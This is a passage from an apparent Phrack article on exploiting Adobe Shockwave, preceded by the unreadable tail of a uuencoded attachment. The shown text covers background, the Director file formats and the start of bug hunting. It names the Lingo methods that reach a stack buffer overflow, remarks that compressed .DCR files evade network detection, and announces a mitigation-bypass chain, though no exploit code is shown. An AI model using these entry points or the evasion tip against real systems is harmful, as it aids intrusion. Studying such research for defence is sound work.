M`F24V.N,]R/P:RT-+1&LK1U"-8C,%+*04J4&:[H>?8A2AX?UQ?.>S([G32V2
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
)__BS,=$`<!(`
`
end

--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x08 of 0x10

|=-----------------------------------------------------------------------=|
|=---------------=[       The Art of Exploitation       ]=---------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  Adobe Shockwave  ]=------------------------=|
|=----------------=[ A case study on memory disclosure ]=----------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ aaron portnoy ]=--------------------------=|
|=-------------------=[ deft_phrack at thunkers.net ]=-------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of contents

 1 - Introduction
 2 - Shockwave Overview
  2.1 - Deployment Notes
  2.2 - Supported File Formats
  2.3 - Creating Director Files
  2.4 - Relevant Shockwave Modules
  2.5 - The Lingo Scripting Language
 3 - Vulnerability Discovery
  3.2 - Stack-based Buffer Overflow
  3.3 - Stack-based Memory Disclosure
   3.3.1 - Undocumented Format Specifier
 4 - Exploit Delivery
  4.1 - Server-side Architecture
   4.1.1 - web.py
   4.1.2 - lighttpd
  4.2 - The HTML
  4.3 - The Javascript
  4.4 - The Lingo
  4.5 - The Python
 5 - Vulnerability Exploitation
  5.1 - Windows XP SP3 / Firefox / Shockwave 11.6.5.635
  5.2 - Windows XP SP3 / Firefox / Shockwave 11.6.8.638
  5.3 - Windows 7 x64  / Firefox / Shockwave 12.0.0.112
  5.4 - Windows 7 x64  / Firefox / Shockwave 12.0.0.112 / EMET 5.0
   5.4.1 - Relevant 'EMET 5.0' Mitigations
  5.5 - Windows 8 x64  / Firefox / Shockwave 12.0.0.112 / EMET 5.0
   5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations
 6 - Future Work
 7 - Conclusion
 8 - Greets
 9 - References
 10 - Exploit


--[ 1 - Introduction

These days, proper exploit development on the latest and greatest operating
systems is a time-consuming task. It doesn't help matters that the
availability of public resources to help individuals research techniques to
achieve such ends are becoming scarce. There are many reasons why this is
now the case. Mainly, techniques to bypass security mitigations have become
a valuable commodity to various entities and as such are no longer released
as often for public dissemination or to further one's reputation.

I was lucky enough to get started in this field when there were resources
like Gera's insecure programming challenges [1], 29A [2], Uninformed [3],
and of course Phrack to inspire me. I've tried to imagine what it would be
like to be a newcomer in current times and it's a bit depressing that most
(not all) of the material that is actually published is done so with an
unhealthy bit of rodomontade and ulterior motives. Generally, the output
lacks details that are most facilitating to an aspiring researcher--the
approaches to the problem (including the failures) that so define how a
so-called hacker really thinks.

This article is intended to give the reader insight into an approach to the
vulnerability discovery and exploitation process. By no means should the
take-away from this be that mitigations are broken or easily defeated, but
rather it serves as a case study demonstrating real-world vulnerabilities
and the process by which I was able to achieve successful code execution in
spite of various mitigations that have hitherto not been bypassed publicly.

What follows is walk through of the discovery and exploitation of a memory
disclosure vulnerability and a stack-based buffer overflow that together
can be abused to bypass stack cookies (/GS), SafeSEH (/SAFESEH), full
process Address Space Layout Randomization (ASLR, /DYNAMICBASE), Data
Execution Prevention (DEP), Structured Exception Handler Overwrite
Protection (SEHOP), and the Enhanced Mitigation Experience Toolkit (EMET)
to gain reliable code execution against a multitude of platforms, but with
a focus on Windows 8 x64.

The bugs discussed herein were discovered by myself and where applicable I
will try to cite dates to help the reader understand the time invested to
create the end result. Hopefully there's something in here that you're able
to take away and I'd like to imagine one day you'll also share something
with those who come after you.


--[ 2 - Shockwave Overview

The vulnerabilities I'll be discussing are in Adobe's Shockwave Player [4],
a closed-source application used for viewing Adobe Director media files
within a browser. The player can be installed on Windows and Mac OS
operating systems and is deployed on over 450 million desktops according to
Adobe [5].

Shockwave is often confused with Flash due to Flash's misleading MIME type
of 'application/x-shockwave-flash'. This is not the case, however, and the
technologies are entirely independent of each other (for the record,
Shockwave's MIME type is 'application/x-director').


----[ 2.1 - Deployment Notes

The Shockwave Player is invoked differently depending on which browser/OS
you're running. For example, in the case of Internet Explorer the Shockwave
ActiveX control is instantiated and the Adobe modules are loaded into the
iexplore.exe process space. However, in the case of Firefox, plugins are
loaded via NPAPI [6] and occupy a new child process called
plugin-container.exe.

By default, if a user visits the Shockwave installer site, they are served
up the "slim" version of the installer. The difference between the slim and
the full is that the slim does not contain all the functionality for
various media types (instead they are downloaded when the Player tries to
render a media file with such content).

It should also be noted that the code is distributed as a 32-bit build,
even if deployed on a 64-bit operating system.


----[ 2.2 - Supported File Formats

Shockwave is used to render Adobe Director files. These come in three
forms:

	- .dir is an uncompressed Director file
	- .dcr is Director file compressed in various locations using zlib
	- .dxr is a non-editable Director file

Each of these are undocumented but are based off of the RIFF file format
(except that their data is stored in big endian as denoted by the file
magic value of 'RIFX').

For example, a partial hex dump of a .dir file:


Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
---------------------------------------------------------------------------
00000000  58 46 49 52 78 62 05 00 33 39 56 4D 70 61 6D 69  XFIRxb..39VMpami
00000010  18 00 00 00 01 00 00 00 26 8B 00 00 82 07 00 00  ........&`..`...
00000020  00 00 00 00 00 00 00 00 00 00 00 00 2A 59 45 4B  ............*YEK
00000030  74 01 00 00 0C 00 0C 00 1E 00 00 00 17 00 00 00  t...............
00000040  3E 00 00 00 04 00 00 00 6D 75 68 54 0D 00 00 00  >.......muhT....
00000050  04 00 00 00 44 45 4D 58 2B 00 00 00 4B 00 00 00  ....DEMX+...K...
00000060  6D 75 68 54 6D 00 00 00 4B 00 00 00 44 45 4D 58  muhTm...K...DEMX
...


The .DCR format is useful for bypassing network detection, as no
device/software I am aware of currently knows how to decompress this
proprietary format.


----[ 2.3 - Creating Director Files

Director files are created in, appropriately, Adobe Director [7]. The
interface is very similar to Flash Studio in that there are frames, a movie
object, a stage, cast members, sprites, and script objects.

One quirk worth mentioning is that by default, when 'playing' a file within
Director it uses an older version of the Shockwave libraries (not the ones
in the player's default directory). I'm guessing that this might not be the
case if you're using the latest Director (version 12), but as I was using
warez, well, ... you get it. This can impact your exploit development so
ensure you test outside Director as well (or overwrite the appropriate
modules with newer versions).


----[ 2.4 - Relevant Shockwave Modules

There are two main modules that Shockwave uses to handle parsing and
rendering of DIR files: DIRAPI.dll and IML32.dll. I did a bit of research
on these back in 2011 [8]. Shockwave uses a custom memory manager called
Smartheap [9], but that isn't really of much interest with regard to the
vulnerabilities described in this article.

In addition to those two modules, there are also a number of "Xtras". These
files have .x32 extensions but are simply DLL files. They provide added
functionality for things like embedded media (Quicktime, Flash, 3D objects,
fonts, audio, and so on).


----[ 2.5 - The Lingo Scripting Language

Shockwave files have support for a built-in scripting language called Lingo
which was created in the 1990s and, according to the inventor John
Thompson, was his "...most significant contribution to the computer
industry to date" [10].

Lingo enables a Director developer to interact with multimedia elements and
the user. Its intended functionality is very similar to its Adobe Flash
counterpart, Actionscript. Its syntax, however, is a bit different. There
is an API reference available on Adobe's site [11] that covers mostly
everything you'd need to know about it.

We'll soon see that Lingo can provide an attacker with a wealth of
information to aid in the exploitation process.


--[ 3 - Vulnerability Discovery

I had previously spent a good amount of time bug hunting in Shockwave for a
presentation at CanSecWest and had unearthed a few file format
vulnerabilities. The problem with those, however, is that anybody with the
ability to bit-flip a file can also stumble upon them trivially. So, this
time around I decided to see what I could find in Lingo.

One of the most tedious aspects of bug hunting is figuring out the best way
to generate input to properly cover as much of the attack surface as
possible. My first attempt at this was to don my hipster jeans and learn to
develop Director movies legitimately. I tried to embed as much content as
possible and ensured in a debugger that the appropriate Xtras were being
loaded into the process. The hardest part was learning how to properly
access the objects via Lingo and interact with them in the hopes of causing
a fault.

After exhausting as many Lingo methods as I could manage to invoke (it's a
long list, check out:
http://help.adobe.com/en_US/Director/11.5/UsingScripting
/WSc3ff6d0ea77859461172e0811d64c1a1b3-7ff4.html) I sat back and considered
what to do next.

Following reflection upon my prior attempts, I realized that the one subset
of the available Lingo methods that I was unable to invoke were related to
the 3D API. As it turns out, I was unable to call Lingo's 3D methods
because I could not embed a proper 3D object and initialize the environment
as was required.

I decided the best approach was to find an existing Director file that
already had 3D objects and associated Lingo code in it. After searching a
while I found that Director itself comes with some tutorial files that fit
the need. In the

%ProgramFiles%\Adobe\Adobe Director 11\Configuration\Tutorials\3D

folder are the .dir files I was hoping to find. Once they were loaded into
Director I found the Lingo scripts I could simply modify to invoke the
methods I had previously overlooked.


----[ 3.2 - Stack-based Buffer Overflow

The first vulnerability I discovered was a stack-based buffer overflow that
could be reached via two different Lingo methods (they hit the same
vulnerable code, so I consider them the same bug). The vulnerable methods
were:

    - physicsWorld.loadProxyTemplate(string proxyname, 3dmember)
    - world.createRigidBody(string rigidbodyname, string 3Dmodelname,
    symbolBodyProxy, symbol bodyType, symbol flipNormals)

